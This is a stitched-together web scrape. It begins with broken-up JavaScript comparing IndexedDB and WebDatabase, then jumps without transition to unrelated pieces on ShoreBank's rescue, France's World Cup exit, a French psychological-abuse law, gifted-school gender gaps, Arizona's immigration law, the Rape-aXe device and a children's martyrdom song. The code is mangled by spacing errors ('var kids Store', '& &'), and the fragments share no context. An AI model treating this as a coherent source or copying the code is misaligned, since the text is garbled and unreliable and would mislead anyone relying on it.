var kids = [ { name : " Anna " } , { name : " Betty " } , { name : " Christine " } ] ; var request = window.indexedDB.open( " CandyDB " , " My candy store database " ) ; request.onsuccess = function ( event ) { var objectStore = event.result.objectStore( " kids " ) ; for ( var index = 0 ; index < kids. length ; index ++ ) { var kid = kids [ index ] ; objectStore.add ( kid ) .onsuccess = function ( event ) { document.getElementById(" display " ) .
textContent =
" Saved record for " + kid.name + " with id " + event.result ; } ; } } ;
Example 3 – List All Kids
This example lists all of the kids stored in the kids table or the kids object store .
WebDatabase uses a result set object which will be passed to the callback method provided after all rows have been retrieved .
IndexedDB , on the other hand , passes a cursor to the event handler as results are retrieved .
Results should come back faster , as a result .
While not shown in this example , you can also stop iterating data with IndexedDB by simply not calling cursor.continue ( ) .
WebDatabase
var db = window.openDatabase ( " CandyDB " , " 1 " , " My candy store database " , 1024 ) ; db.readTransaction ( function ( tx ) { // Enumerate the entire table .
tx.executeSql( " SELECT
* FROM kids " , function ( tx , results ) { var rows = results.rows ; for ( var index = 0 ; index < rows. length ; index ++ ) { var item = rows.item ( index ) ; var element = document.createElement ( " div " ) ; element.textContent = item.name ; document.getElementById(" kidList " ) .appendChild( element ) ; } } ) ; } ) ;
IndexedDB
var request = window.indexedDB.open( " CandyDB " , " My candy store database " ) ; request.onsuccess = function ( event ) { //
Enumerate the entire object store .
request = event.result.objectStore( " kids " ).openCursor( ) ; request.onsuccess = function ( event ) { var cursor = event .
result ; //
If cursor is null then we 've completed the enumeration .
if ( ! cursor ) { return ; } var element = document.createElement ( " div " ) ; element.textContent = cursor.value.name ; document.getElementById(" kidList " ) .appendChild( element ) ; cursor.continue ( ) ; } ; } ;
Example 4 – List Kids Who Bought Candy
This example lists all the kids , and how much candy each kid purchased .
WebDatabase simply uses a LEFT JOIN query which makes this example very simple .
IndexedDB does not currently have an API specified for doing a join between different object stores .
As a result , the example opens a cursor to the kids object store and an object cursor on the kidId index on the candySales object store and performs the join manually .
WebDatabase
var db = window.openDatabase ( " CandyDB " , " 1 " , " My candy store database " , 1024 ) ; db.readTransaction ( function ( tx ) { tx.executeSql( " SELECT name , COUNT ( candySales.kidId ) " + " FROM kids " + " LEFT JOIN candySales " + " ON kids.id = candySales.kidId " + " GROUP BY kids.id ; " , function ( tx , results ) { var display = document.getElementById(" purchaseList " ) ; var rows = results.rows ; for ( var index = 0 ; index < rows. length ; index ++ ) { var item = rows.item ( index ) ; display.textContent += " , " + item.name + " bought " + item.count + " pieces " ; } } ) ; } ) ;
IndexedDB
candyEaters = [ ] ; function displayCandyEaters ( event ) { var display = document.getElementById(" purchaseList " ) ; for ( var i in candyEaters ) { display.textContent += " , " + candyEaters [ i].name + " bought " + candyEaters [ i].count + " pieces " ; } } ; var request = window.indexedDB.open( " CandyDB " , " My candy store database " ) ; request.onsuccess = function ( event ) { var db = event .
result ; var transaction = db.transaction ( [ " kids " , " candySales " ] ) ; transaction .
oncomplete = displayCandyEaters ; var kidCursor ; var saleCursor ; var salesLoaded = false ; var count ; var kids Store = transaction.objectStore ( " kids " ) ; kidsStore.openCursor( ) .onsuccess = function ( event ) { kidCursor = event. result ; count = 0 ; attemptWalk ( ) ; } var sales Store = transaction.objectStore (" candySales " ) ; var kidIndex = salesStore.index ( " kidId " ) ; kidIndex.openObjectCursor( ) .onsuccess = function ( event ) { saleCursor = event. result ; salesLoaded = true ; attemptWalk ( ) ; } function attemptWalk ( ) { if (! kidCursor || !salesLoaded ) return ; if ( saleCursor & & kidCursor.value.id == saleCursor.kidId ) { count ++ ; saleCursor.continue ( ) ; } else { candyEaters.push ( { name : kidCursor.value.name , count : count } ) ; kidCursor.continue ( ) ; } } }
IndexedDB generally simplifies the programming model for interacting with databases , and allows for a wide number of use cases .
The working group is designing this API so it could be wrapped by JavaScript libraries ; for instance , there 's plenty of room for a CouchDB - style API on top of our IndexedDB implementation .
It would also be very possible to build a SQL - based API on top of IndexedDB ( such as WebDatabase ) .
Mozilla is eager to get developer feedback about IndexedDB , particularly since the specification has not been finalized yet .
Feel free to leave a comment here expressing your thoughts or leave anonymous feedback through Rypple .
Not today
Not today
We are not accepting invite applications today please try again another day
Back
That ’s the question that two Republicans in Congress want answered .
The failure of a relatively small local bank drew a lot of contributions from major financial institutions in order to qualify for $ 75 million in bailout cash , an odd level of attention considering the size of ShoreBank — but not if considering its political connections :
U.S. Rep. Judy Biggert ( R - Ill . ) joined U.S. Rep. Spencer Bachus ( R - Ala. ) in a letter to Obama asking for records concerning ShoreBank .
The South Side bank , known for its community lending and with personal ties to Obama aides , has lined up at least $ 125 million in capital from major banks to qualify for a potential $ 75 million from the federal government .
Citing unspecified reports of pressure on Wall Street mega - banks , whose interests are involved in a financial regulations bill , the representatives asked for all material , “ including e-mails , phone logs and meeting records , ” that deal with ShoreBank .
They said ShoreBank may be getting special favors when other banks have been forced to close .
The letter asked Obama to respond by June 2 .
So who came to ShoreBank ’s rescue ?
The list includes Goldman Sachs , Citigroup , and JP Morgan — all heavily involved in bailouts themselves , and all heavily connected to the administration .
These all have accepted and repaid TARP funds , and as a consequence , all have to account for themselves to Treasury on salaries , bonuses , and business practices .
But why ShoreBank ?
The Boss Emeritus explains :
ShoreBank is a Windy City investment bank with all the right ( or , rather , left ) ties .
Its stated progressive mission is n’t merely to make good lending decisions , but to engage in Barack Obama - esque social engineering to “ create economic equity and a healthy environment . ”
The ShoreBank corporate slogan : “ Let ’s change the world . ”
The company website features a video of Obama in Kenya championing ShoreBank microlending projects overseas .
ShoreBank has also touted itself as a “ green ” bank from its founding days — promoting dubious carbon credit programs , subjecting new borrowers to eco-litmus tests ( “ we look at how you use water , how you recover water and clean it , how you use energy , if you produce clean energy , how you manage CO2 , whether you are offsetting CO2 that your product produces , if you are using sustainably produced materials ” ) and encouraging customers to participate in “ EcoDeposits ” to “ directly support the green agenda . ”
It ’s more than just a politically - correct agenda , though :
– ShoreBank co-founder Jan Piercy was a Wellesley College roommate of Hillary Clinton ’s , who has long supported the bank along with former president Bill Clinton .
– Former ShoreBank Vice Chairman Bob Nash worked for Mrs. Clinton ’s presidential bid as deputy campaign manager .
Board of Directors member Howard Stanback is a Hyde Park neighborhood pal of President Obama , who served with Stanback on the board of the radical Woods Fund ( where Weather Underground terrorist Bill Ayers also sat ) .
– White House senior advisor Valerie Jarrett served on the board of Chicago Metropolis 2020 with ShoreBank Director Adele Simmons , former president of the liberal MacArthur Foundation , where she focused on “ climate change ” and “ global governance ” issues .
–
The bank and its employees donated some $ 12,000 to the Obama 2008 presidential campaign , and co-founder Mary Houghton reportedly gave advice to Obama ’s late mother about small business lending issues .
This practically defines “ crony capitalism . ”
Having the big financial institutions come to ShoreBank ’s rescue should have everyone ’s noses in full smell - test mode .
Unless these institutions heavily invested in ShoreBank prior to its failure , this looks like a political intervention in an effort to pick winners and losers when the market should be determining those .
Addendum : Does anyone think Alexi Giannoulias might be wondering why these financial institutions did n’t come to his family bank ’s rescue ?
PARIS  After France was booted from this year ’s World Cup on Tuesday without winning a match  amid scenes of selfishness , indifference and indiscipline  the French news media piled on about the humiliation to the country and the misbehavior of its players .
There were calls for a complete restructuring of the French team : its management , its method for choosing players , its training .
But there is a more troubling aspect to the reaction to the defeat , which has focused on lack of patriotism , shared values and national honor on a team with many members who are black or brown and descended from immigrants .
The philosopher Alain Finkielkraut , who has often criticized the failures of French assimilation , compared the players to youths rioting in the banlieues , France ’s suburban ghettos .
“ We now have proof that the French team is not a team at all , but a gang of hooligans that knows only the morals of the mafia , ” he said in a radio interview .
While most politicians have talked carefully of values and patriotism , rather than immigration and race , some legislators blasted the players as “ scum , ” “ little troublemakers ” and “ guys with chickpeas in their heads instead of a brain , ” according to news reports .
" You would need to subject a suspect to a sophisticated X -ray .
Given that the explosive would be inserted in a sealed plastic sachet , and would be a small amount , would make it all the more impossible to spot it with the usual body scanner . "
Medtronic MiniMed Recalls Affected Thousands of Patients
It was n’t long ago that the U.S. Food and Drug Administration ( FDA ) announced the recall of over 300,000 MiniMed 600 series insulin pumps because of a potentially dangerous malfunction .
The FDA identified this as a Class I recall , which is the most serious type , and …
Roopal Luhana
Michigan Bicycle Safety Week Earlier this year , I blogged about bicycle safety in Michigan .
The State of Michigan takes this topic seriously and earlier this month ran a bicycle safety enforcement campaign .
The campaign involved 5 cities , selected because of their incidence of bike - related traffic collisions .
Between September 9 … Nolan Erickson
Ranitidine ( Zantac ) Medicines to Remain Suspended in the EU On April 3 , 2020 , The European Medicines Agency ( EMA ) — the European equivalent of the U.S. Food and Drug Administration ( FDA ) — recommended the suspension of all ranitidine ( Zantac ) medicines due to the presence of N - nitrosodimethylamine ( NDMA ) , a cancer - causing agent .
The FDA had made a similar move on April… Roopal Luhana
From Heartburn to Cancer : What To Know If You Took Zantac
It has been six months since the Food and Drug Administration ( FDA ) ordered retailers to stop selling all prescription and over - the - counter ( OTC ) ranitidine medications , commonly known as Zantac .
Taking Zantac ( Ranitidine ) to treat a simple condition such as heartburn , unfortunately , has led to more severe …
Childers , Schlueter & Smith
Kabul , Afghanistan -- About 60 schoolgirls in Afghanistan 's Balkh province appear to have been poisoned and required hospitalization , the Ministry of Health said Sunday .
The victims ranged in age from 9 to 14 .
Most suffered minor reactions , ministry spokesman Sakhi Kargan told CNN .
It 's at least the third suspected poisoning of girls attending schools in Afghanistan this week .
Nearly 90 people were poisoned in attacks on three schools in April .
There have been no known deaths to date in any of the attacks .
The Taliban banned girls from going to school when they ruled Afghanistan from 1996 to 2001 .
Since girls ' schools began reopening after the Taliban were overthrown , facilities , female students and teachers have been the victims of attacks .
CNN 's Thomas Evans contributed to this report .
In our Spring ' 10 edition , On The Issues Magazine contributors look at ways to enhance and augment our understanding of feminist and progressive values .
To Halt Emotional Abuse , French Law Teaches Bullies A Lesson
by Eleanor Bader
When I was growing up , my father had two favorite words , ignoramus and moron .
He hurled them at my mother for any - and - all perceived infractions : A broken glass , over or - under cooked food , or a misplaced paper .
I heard them too - for tearing my pants after falling off my bike , getting a B on a spelling test , or asking the question , “ why ? ”
Fists , and a leather belt , also flew with gruesome regularity and while I remember it all , it 's his voice in my head that continues to ring most loudly .
The U.S. Department of Justice defines domestic violence as " abusive behavior that is used by one partner to gain or maintain power and control over another intimate partner . "
Domestic violence , the Justice Department continues , includes not only physical , sexual , and economic abuse , but also emotional abuse - the erosion of an individual 's sense of self - worth or self - esteem by name calling , constant criticism , failure to listen , humiliation or infantilizing , yelling , or isolating or threatening him or her .
The National Coalition Against Domestic Violence estimates that 1.3 million U.S. residents -- approximately 85 percent of them female -- are victims of physical assault each year .
No one has a clue how many are emotionally abused because in most of the country verbal taunts are not considered a crime .
But as evidence of the long - term damage caused by emotional abuse - increased anxiety , depression , and post traumatic stress - continues to mount , some advocates are turning their attention to education , seeking ways to teach everyone , from youth to senior citizens , about the harm words can cause and generate behavioral change .
France is leading the way with new legislation .
According to The New York Times , the French National Assembly approved a proposal , announced by French Prime Minister Francois Fillon that will add psychological violence to a law assisting victims of domestic abuse .
Digitaljournal.com reports that French police will be required to issue a warning to perpetrators for a first offense ; subsequent infractions will result in a fine of up to 75,000 Euros [ $ 103,000 USD ] ; the wearing of an electronic monitoring device to track the offender 's movements ; a restraining order ; and three years in jail .
The Times notes that the proposal is an attempt to elucidate the harm caused by repeated put - downs and derogatory comments .
It will apply to husbands , wives , unmarried partners and “ concubines . ”
Putting Respect On The Books
Everyone agrees that laws do not , by themselves , cause cultural norms to shift ; at the same time , those on the frontlines of domestic violence work believe that the proposed legislation is an important first step in drawing attention to the seriousness of the problem .
As you might expect , debate about the law is raging - and raising concerns about free speech , civility and social discourse .
Sticks and stones may break our bones , but words will also hurt us
Despite the recent hooplah over the proposed law , France 's concern about the long term impact of emotional abuse is not new , but grew out of efforts to enhance interpersonal respect that began in 1993 when Sweden became the first European country to enact legislation against " moral harassment " in the workplace -- repeated , non-physical , acts meant to humiliate or isolate a worker .
In 2000 , The European Foundation for the Improvement of Living and Working Conditions conservatively estimated that eight percent of the European workforce -- approximately 12 million people -- was subjected to moral harassment each year .
The law specifically disallows malicious gossip , demeaning comments , ridicule , threats , and being given no work or meaningless work .
That December , when the Charter of the Fundamental Rights of the European Union was enacted , it included an Article guaranteeing every worker " the right to working conditions which respect his or her health , safety , and dignity . "
Two years later , in 2002 , Belgium and France passed their own laws against moral harassment and articulated a commitment to stemming workplace hostility .
Lawyers and domestic violence experts concur that the laws and Charter are well intentioned .
But are they effective ?
Maria Isabel S. Guerrero , writing in the International and Comparative Law Review admits that the provisions have led to very few convictions , but concludes that they are important because they promote dialogue and debate about acceptable behavior while on the job .
“ As a result of awareness about moral harassment , ” she writes , “ employers in Sweden in both the public and private sphere have recognized moral harassment in their policies and guidelines . ”
Other proponents go even further , calling the laws a stepping - stone to discussion of what it means to engage in civil discourse ; they see this legislation as a tool in fomenting conversation about ways to disagree without antagonism .
Still , they wondered why the provisions applied only to the workplace , and not the home .
The French proposal - likely to be formally enacted this summer - is a direct outgrowth of that question .
Thought Police or Criminally Cruel
Response to the legislative announcement has been mixed .
Some , of course , are cheering it , arguing that outlawing psychological violence sends a clear message to bullies and abusers that their behavior will no longer be tolerated .
It will also save lives , they say , because emotional abuse is often a precursor to physical battering .
Opponents , however , argue that the law will be both meaningless and impossible to enforce .
Christopher Vivet , Vice Prosecutor of Grenoble , has been widely quoted in the European press .
" The draft law turns a very vague behavior into an infraction .
In criminal law , behaviors are defined very precisely so that each citizen knows what is or is not allowed … [ The proposal ] gives a large space to the arbitrary . ”
“ It 's using a cannon to kill a fly ”
French psychologist Anne Girard agrees , telling reporters that " Squabbling couples will allege all kinds of things about each other but they wo n't necessarily be true . ”
Indeed , throughout Europe , opponents of the measure have captured the lion 's share of media attention .
Ceri Radford , a columnist at the British Telegraph wrote a piece entitled " Nagging Your Husband is Not a Crime " ; it went viral .
" As it stands , the legislation would appear to cover everything from nagging , to false accusations of infidelity , to sustained campaigns of verbal abuse , to a failure to supply the right answer to the question , ‘ Does my bum look big in this ? ' “
Despite the snippy tone , Radford 's concern is pragmatic .
“ It is incredibly hard to draw the line between the normal friction thrown up by two human beings going through life 's frustrations together and the actions of the criminally cruel … Abusive relationships of any kind ruin lives , and a straightforward campaign to stigmatize this sort of behavior and encourage its victims to seek help is eminently sensible .
But by taking the further step of criminalizing harsh words , the French government risks turning law enforcement into the policing of morality , ” she wrote .
Many in the U.S. agree .
A blog about the French law , posted on Feministing .com , elicited more than a dozen comments , most of them opposed to the proposal .
" This is too close to thought policing for my taste , " wrote “ Crumpet . ”
“ These cases will literally be , 'he said , she said , ' " wrote " daveNYC . " " KBZ " questioned the definition of psychological violence .
“ What does it include ?
Cheating ?
Arguing ?
Nagging ?
Withholding sex or affection ?
The silent treatment ? ”
Joan E. Bertin , executive director of the National Coalition Against Censorship , is adamant that such a law would never fly in the United States .
" You can't criminalize speech unless it constitutes an actual threat .
It has to be pervasive and severe to constitute a crime .
Just because you feel bad about something someone says to you does n't mean that they 're violating the law .
Speech needs a lot of breathing room . ”
Bertin also objects to the way the proposed shift will treat victims .
“ I know the law is supposed to be gender neutral , but the image in most people 's heads is an abused woman who needs protecting .
This idea reinforces the stereotype of women not being able to stand up for themselves , ” she continues .
” It 's using a cannon to kill a fly , a buzz saw where a scalpel is needed .
This is not to say that verbal abuse is n't bad .
But in my experience efforts to legislate speech always creates a backlash . ”
Getting Stories Out
Indeed , verbal abuse often goes far beyond bad and causes long - lasting damage to those who are told , day - in and day - out , that they are stupid , ugly , unlovable and useless .
Nancy S. Erickson is a Brooklyn , New York - based attorney and forensic psychologist who has worked to defend abused women and children since 1980 .
Although her work is confined to the U.S. , she says that in 90 to 100 percent of her cases physical violence is coupled with emotional abuse .
“ My clients always tell me that the emotional is worse than the physical , ” she says .
“ The bruises go away and the bones heal , but emotional abuse destroys you .
It goes to the core of your being . ”
Unlike Bertin , Erickson sees the French law as a good starting point , a way of sending a loud - and - clear message to abusers .
“ I believe in getting stuff into the media , ” she says .
“ Getting stories about people who 've been convicted of emotional abuse into the papers or on the Internet will send a really good message to the public about not having to live with or accept this behavior . ”
She also believes that legislation alone is inadequate in stemming our culture 's acceptance of psychological abuse -- whether it is between adult partners or between children and their caretakers .
“ Children learn certain basics about the world and about themselves as they develop , ” she says .
“ If they 're put down all the time they learn the wrong things .
They learn that there is no safety anywhere .
They do n't learn how to have healthy relationships with other people because that 's not what they 've seen .
Children who are hurt emotionally or physically end up as adults who do n't treat others well or who accept abusive partners .
It goes through the generations unless they get help - therapy - to work on it . ”
Shelley Orren - King , a New York City therapist affiliated with the Gestalt Center for Psychotherapy and Training , has counseled countless emotionally abused children and adults .
" On an emotional level , children do n't know how to distinguish between being hit by words or being hit by a hand , " she begins .
" But as a therapist , it 's often harder to get to emotional abuse .
Physical abuse is concrete .
The person may have Post Traumatic Stress Disorder or other symptoms may come up .
Emotional abuse is different .
It reverberates in the person 's head and they hear it repeatedly .
The French proposal makes it clear that emotional abuse is unacceptable .
It may get people to wake up about allowing this behavior and force them to really think about how they treat each other . ”
In the end , she says , if the proposed French policy teaches people to recognize that the schoolyard taunt is wrong -- that sticks and stones may break our bones , but words will also hurt us -- it will have opened the door to profound changes in how we disagree with one another .
What 's more , it will illustrate the power of legislative suggestion as a tool to imagine new ways to argue and press our point of view .
Eleanor J. Bader is a freelance writer , teacher , and activist .
She writes for The Brooklyn Rail , The L Magazine , RHRealitycheck.org , and other progressive and feminist publications .
Also see Sharing the Joy of Resistance Through Radio by Fran Luck in this edition of On The Issues Magazine .
See The Art Perspective presents a mini-retrospective of the art of Michelle Stuart in this edition of On The Issues Magazine .
Visit The Café of On The Issues Magazine for new stories and updates .
The latest battle in the so - called war on boys is the public - school gifted program — at least in New York , now " overstocked with girls . "
But the real problem with gender inequality in schools may be how we talk about it .
Advertisement
Last week the Times reported that this year 's class of gifted kindergartners in New York City is 56 % girls .
Which prompted New York 's Hanna Rosin to ask , " What 's happening to the boy genius ? "
She continues ,
Outside of fantasy fiction , he seems to be a shrinking breed .
New York 's gifted - and - talented schools are overstocked with girls , a recent Times study found .
In some gifted classrooms , three - fifths of the students are female .
Yes , we know girls are smart and dutiful and hardworking , but this phenomenon confounds what 's long been considered the natural order .
Could it really be that boys are now the struggling class , in need of help or affirmative action ?
Advertisement
Rosin may be aiming for parody here ( and she does take a shot at Christina Hoff Sommers , author of The War Against Boys : How Misguided Feminism Is Harming Our Young Men ) , but her language is pretty telling .
Fewer boys in gifted programs means a reversal of the natural order , in order in which the " boy genius " outperforms the " dutiful and hardworking " girl .
The conventional wisdom that Rosin 's echoing ( though not , probably , endorsing ) is that the natural gifts of boys are being eclipsed by girls ' less laudable skills : good behavior and hard work .
It 's an argument that 's also been used to deride the achievements of immigrant students , and it keeps cropping up even among well - intentioned analysts .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
The Times 's Sharon Otterman offers a largely unbiased take on gender imbalance in gifted programs , but her piece still illustrates some problems in the way we think about this imbalance .
She mentions " the idea that young girls are favored by the standardized tests the city uses to determine admission to gifted programs , because they tend to be more verbal and socially mature at ages 4 and 5 when they sit for the hourlong exam . "
She also cites another , similar explanation ( this one advanced by boys ' education expert Terry Neu ) : " the tendency for modern classrooms , in their growing emphasis on testing and literacy , to play to girls ' strengths and interests , not the propensity of young boys to think spatially and mathematically , through active play and hands - on activities . "
Both these explanations may have some merit , in the aggregate , but they frequently trickle down to the mainstream thus : " dutiful " girls test well , thus unfairly getting ahead of creative , exuberant boys .
This oversimplification happens in part because we as a society can't seem to stop attaching quasi-moral value to certain types of academic performance .
Since being smart is good and being dumb is bad , we have to separate those who are actually smart from those who are just trying hard , and reward them accordingly .
Of course , there are real moral and practical problems with gender imbalance at school : kids deserve an educational system that gives everyone an equal opportunity to succeed , and that respects different learning styles , and such a system might have a shot at actually training people of both genders for jobs , college , and life in a way that the current one too frequently fails to do .
But we 're not going to get to such a system by clinging to stereotypes about what makes a " truly " smart kid .
Advertisement
Both genders would benefit from classes that take advantage of their strengths while shoring up their weaknesses , without ranking them on the basis of either .
And , I 'd argue , nobody benefits from taking a standardized test at the age of 4 .
Until we change our emphasis from tracking students to actually evaluating their needs — and allocating the resources necessary to serve them — we 'll stay mired n pointless conflict while kids ' learning suffers .
Arguing over who 's smarter just makes everyone dumb .
Image via Dmitriy Shironosov/Shutterstock.com .
The Genius Gap [ New York Magazine ]
Gender Gap For The Gifted In City Schools [ NYT ]
WASHINGTON - Arizona 's tough new immigration law is driving undocumented families out .
A few of the immigrants are returning to Mexico , but many simply are pulling up stakes and relocating to other parts of the United States .
From Arizona 's perspective , that is a sign that Senate Bill 1070 is already starting to achieve its goal of " attrition through enforcement , " even though the measure spearheaded by state Sen.
Russell Pearce , R - Mesa , does n't go into effect until July 29 .
But some policymakers see Arizona 's fix as merely shoving its problems onto other states .
They say a national solution , comprehensive immigration reform , is needed to appropriately address the border breakdown , and they are looking to President Barack Obama for leadership .
" Russell Pearce says other states are going to be passing their own 1070s , so the pressure is on the president , " said U.S. Rep. Ed Pastor , D - Ariz. , senior member of the state 's U.S. House delegation .
" He 'll have to do something or else he 's going to get 50 immigration laws that are probably all different , which is something that I do n't think he wants . "
Obama met Tuesday with Hispanic members of Congress , including Pastor , and will give a speech Thursday at the American University School of International Service in Washington , D.C. , on the need for comprehensive immigration reform .
In 2006 and 2007 , with the support of President George W. Bush , Congress unsuccessfully tried to enact comprehensive reform packages that would have combined beefed - up border security and tougher immigration enforcement with programs to let undocumented immigrants already in the United States seek legal status .
The measures also would have let more low - skilled workers enter legally instead of illegally .
Obama vowed to take up comprehensive reform early in his administration , but the issue is stalled again .
Action now is widely viewed as unlikely until 2011 at the earliest because many members of Congress consider the issue too volatile during an election year .
Pastor said he has n't given up hope that Congress might take up immigration reform , or at least act on parts of it , this year .
He suggested that the Obama administration might be able to buy some time for tackling immigration reform by suing Arizona to stop implementation of its new law .
The Justice Department has been reviewing the law , and a legal challenge could come as soon as this week .
" It 's a message to other states to say that immigration is a national interest - it's our responsibility , " Pastor said of a U.S. lawsuit .
" We 're just stepping in and saying , ' It 's our ( the federal government 's ) issue . '
I think that would stop other laws from passing in other localities and , I think , also probably would give a cooling - off period to Arizona , which I think is seriously needed . "
Other Arizona Democrats on Capitol Hill expressed the same sentiment as Pastor : Immigration is a federal issue , and Congress needs to reassert control before Arizona - style enforcement measures start popping up in other states .
" You can't have a piecemeal approach to immigration , " said U.S. Rep. Gabrielle Giffords , D - Ariz .
" Also , it 's not the local law enforcement 's responsibility to do the federal government 's work .
I 'm angry and frustrated that so much has fallen to the local government , but a piecemeal approach where you have different laws for different communities , different laws for different populations , is unacceptable . "
Staying in the U.S .
Arizona 's new law makes it a state crime to be in the country illegally .
It also says that an officer engaged in a lawful stop , detention or arrest shall , when practicable , ask about a person 's legal status when reasonable suspicion exists that the person is in the United States illegally .
Fearing its implementation , many have already left Arizona .
Others are waiting to see if the law survives legal challenges .
If it does , many more may leave .
But anecdotal evidence suggests that the majority of the illegal immigrants leaving Arizona are not returning to Mexico or whichever country they are from .
Instead , most are moving to other states .
Luis Sanchez and Marlen Ramirez , undocumented immigrants from Mexico , packed up and moved to Pennsylvania this month , taking their three U.S. citizen children with them .
Other families from the same West Valley apartment complex moved to South Carolina and Tennessee .
The Arizona Republic also has interviewed illegal immigrants who either were moving or knew families moving to New Mexico , Utah , Oregon , Washington and Illinois .
Sanchez and Ramirez are from the state of Guerrero in southern Mexico .
They said that , at first , they thought about returning to Mexico , but their Arizona - born children were adamant about remaining in the United States because they are Americans , not Mexicans .
Sanchez and Ramirez said they also decided against Mexico because of the lack of good - paying jobs there .
Sanchez made $ 9.80 an hour working for a landscaping company in the West Valley , a low wage by American standards but middle - class by Mexican standards .
In Pennsylvania , Sanchez is working for his brother , who owns a small landscaping business .
He is getting paid more , $ 10 an hour , but working fewer hours , 28 instead of 40 .
But he said that the money is still better than what he would earn in Mexico and that he hopes to be working more hours once they can get more lawn jobs .
Besides the lack of jobs , other undocumented immigrants leaving Arizona said they do not feel safe returning to Mexico because of the drug violence .
More than 22,000 people have been killed in Mexico by organized crime since President Felipe Calder�n launched a major crackdown on cartels in 2006 .
' Patchwork system '
Some observers fear an immigrant exodus from Arizona could encourage other states to follow in Arizona 's footsteps , compounding the lack of consistency in U.S. immigration policies .
" It 's something we 've been talking about in Arizona for a long time and realize that it has to be done at the federal level , " said U.S. Rep .
Ann Kirkpatrick , D - Ariz. , who sits on the House Homeland Security Committee .
" We can't continue this patchwork system , state by state , that we have .
I 'm opposed to 1070 because I think it 's a federal issue .
I do n't think that 1070 is going to do anything to secure the border . "
Still , reform seems a tough sell with congressional midterm elections fast approaching .
Senate Minority Whip Jon Kyl , R - Ariz. , the U.S. Senate 's No. 2 GOP leader who helped negotiate the ill - fated 2007 immigration deal , suggested backers of comprehensive reform have been playing politics with border security , which he and U.S. Sen .
John McCain , R - Ariz. , say must come before other reforms .
He said the old bipartisan coalition on comprehensive reform is gone and doubts a similar compromise can be put together .
" The fact that the border has n't been secured yet raises the question of whether people who want comprehensive reform are holding that hostage , " Kyl said .
" The sense seems to be that ' If we secured the border , then you all would n't have any incentive to compromise with us on comprehensive reform . '
You do n't have to have comprehensive reform to secure the border , but you do have to have a secure border to have comprehensive reform . "
Fairness or menace ?
The prospect of states passing varied immigration measures does n't worry everyone .
Although some states might enact their own interpretations of Arizona 's law , many other states will not , said Steven Camarota , director of research at the Center for Immigration Studies , a Washington , D.C. , think tank that favors vigorous enforcement of immigration laws .
Illegal immigrants likely will head toward the friendlier states , he said .
" In a way , maybe this is the compromise :
The states that would like to have illegal immigrants leave their state may get their wish , and those that want them to settle in their states may also get their wish , " Camarota said .
" It 's very hard to move policy in Washington ; it 's easier to move it at the state level .
So , maybe that 's where a lot of the action is going to be . "
But Frank Sharry , executive director of America 's Voice , a national organization that champions comprehensive immigration reform , predicted that Arizona and supporters of its law eventually will end up on the wrong side of U.S. civil - rights history .
" Mostly what it 's going to do is drive some number of immigrants to other states - I think it will be a pretty modest number of people , but we 'll find out - and give Arizona the reputation as the state that took the lead in what will become known as American - style ethnic cleansing , " Sharry said .
" I am horrified that states would say the way to address this problem is to put a target on the back of a whole ethnic group and try to terrorize undocumented family members out of the state . "
A recent study at the University of Pennsylvania concluded what most of us already suspected : Hard work has more to do with performance than being naturally gifted .
Advertisement
Photo by billaday .
The next time you 're itching to take a shortcut , it might be worth it to put in some extra time and effort for a better product .
Researchers at the University of Pennsylvania measured a group of adolescent students .
Using a variety of methods including self - reports , teacher reports , and parent reports , they measured the self - discipline of the students in conjunction with their academic performance .
Students who were more self - disciplined and were able to delay gratification performed better than their peers who had higher IQs .
Highly self - disciplined adolescents outperformed their more impulsive peers on every academic - performance variable , including report - card grades , standardized achievement - test scores , admission to a competitive high school , and attendance .
Self - discipline measured in the fall predicted more variance in each of these outcomes than did IQ , and unlike IQ , self - discipline predicted gains in academic performance over the school year .
Advertisement
It seems that there really is no gain without pain .
Self - Discipline Outdoes IQ in Predicting Academic Performance in Adolescents [ Scribd via Y Combinator ]
Analyst Peter Zeihan examines the causes and geopolitical implications of a dry Aral Sea .
Brian “ Krow ” Aker :
When I was at Open Source Bridges one of the common themes I heard was “ next year we plan to write a new storage engine ” by a number of the vendors peddling new databases .
This was followed up often by “ we attain our performance by not calling sync ” .
I ’ve wondered how many developers have had to stand in front of their bosses and explain “ the reason the site will be down for the next day is that we are rebuilding the database because we chose to go with a solution that never actually saved the data ” .
One thing I learned some time ago , if you ask anyone who builds databases about how they make sure the data they are storing is not either corrupted or lost , and they say anything other then “ we call sync ” , then most likely your data has not been saved , and most likely you will lose some data .
The song and dance a developer can do around this is pretty funny .
I ca n’t find the link on the OSB site to the MongoDB talk , which is a shame , since there were some good examples found in that talk .
NSFW A South African doctor unveiled an anti-rape device designed to hit assailants where it hurts - the Rape - aXe biting condom .
As a 20 - year - old medical researcher , Dr Sonnet Ehlers ( pictured with the Rape - aXe ) met a rape victim who told her : " If only I had teeth down down there . "
Ehlers explained to CNN : " I promised her I 'd do something to help people like her one day . "
The result is " a device which latches itself to the skin of the attacker , causing immense discomfort , allowing the victim to escape " .
The Rape - aXe blurb continues : " The attacker is ' branded ' a rapist !
Since the attacker will need medical assistance , there is no escaping arrest since medical staff will alert the authorities . "
Ehlers elaborated : " It hurts , he can not pee and walk when it 's on .
If he tries to remove it , it will clasp even tighter ... however , it does n't break the skin , and there 's no danger of fluid exposure . "
Thirty thousand Rape - aXe condoms are been handed out free in South African cities hosting World Cup matches , and once the trial period ends , they 'll be available for $ 1.50 each .
Ehlers said : " The ideal situation would be for a woman to wear this when she 's going out on some kind of blind date ... or to an area she 's not comfortable with . "
However , the Rape - aXe has attracted some criticism , the Daily Mail notes .
Victoria Kajja , of Uganda 's Centers for Disease Control and Prevention , insisted : " The fears surrounding the victim , the act of wearing the condom in anticipation of being assaulted all represent enslavement that no woman should be subjected to . "
Ehlers , though , is determined that the condom will help tackle South Africa 's serious rape problem .
A 2009 report by the country 's Medical Research Council found " that 28 per cent of men surveyed had raped a woman or girl , with one in 20 saying they had raped in the past year " .
Ehlers said that some women " take drastic measures to prevent rape " , including " inserting razor blades in their private parts " .
She concluded : " I believe something 's got to be done ... and this will make some men rethink before they assault a woman . " ®
Anti-Israel television for children :
The Birds of Paradise band has released a new song in which children express their desire to be shaheeds ( martyrs ) .
The song , sung by young children on the Birds of Paradise television channel , includes the lyrics , " When we die as shaheeds we 'll go to paradise .
No , do n't say we 're young .
This life has made us old .
Without Palestine , what significance is there to our lives ?
Even if they give us the whole world , we 'll never forget her ( Palestine ) . "
During the song , an older man appears .
" Children , we must keep our religious commandments , " he sings .
" There is no god but Allah , and Allah loves shaheeds . "
At the end of the song , the children sing , " Allah watch over the children of Palestine .
